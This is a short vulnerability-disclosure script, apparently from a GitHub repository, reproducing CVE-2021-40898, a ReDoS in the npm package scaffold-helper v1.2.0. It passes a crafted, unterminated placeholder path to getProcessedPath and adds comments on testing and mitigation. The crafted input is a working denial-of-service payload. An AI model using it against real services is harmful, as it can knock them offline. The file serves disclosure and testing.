Headline
CVE-2021-40898: SaveResults/scaffold-helper.js at main · yetingli/SaveResults
A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in scaffold-helper v1.2.0 when copying crafted invalid files.
/**
* Package Manager: npm
* Link to published package: https://github.com/cliffpyles/scaffold-helper
* Link to GitHub repo: https://github.com/cliffpyles/scaffold-helper
* Severity level: High
* Module Description: Helps with generating files and file structures
* Additional Info: It can cause a denial of service when copying crafted invalid files.
* Contacted maintainer?: No
* Open issue?: No
*/
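// Reproduction script for the ReDoS reported against scaffold-helper v1.2.0
// (CVE-2021-40898). Use it to confirm whether an installed version is
// affected. Run it in a disposable process: the call is synchronous, so on an
// affected version it may keep the process busy for a long time.
//
// The typographic quotes of the published listing are replaced with plain
// ASCII quotes here; with the curly quotes the script does not parse.
//
// `scaffold` is declared but never assigned; only the destructured helpers
// come from the module, and getRenderedTemplate is not used below.
var scaffold, { getProcessedPath, getRenderedTemplate } = require("scaffold-helper");

// Well-formed call, kept for comparison: each `__name__` placeholder is closed
// and has a matching key in the data object.
// getProcessedPath('/example/__projectName__/src/components/__componentType__', {
//   projectName: 'abc-app',
//   componentType: 'Alert',
// });

// Malformed path from the report: a placeholder is opened with `__`, followed
// by a long run of `-` and a final `!`, and is never closed.
// NOTE(review): the matching pattern inside scaffold-helper is not shown on
// this page; the slowdown is presumably regex backtracking on the unterminated
// placeholder. Confirm against the package source.
// Mitigation for callers: do not hand untrusted path strings to
// getProcessedPath; cap their length and reject unterminated placeholders
// before calling it.
getProcessedPath('/example/__--------------------------------------------------------------------------------------------------------------------------!', {
  projectName: 'abc-app',
  componentType: 'Alert',
});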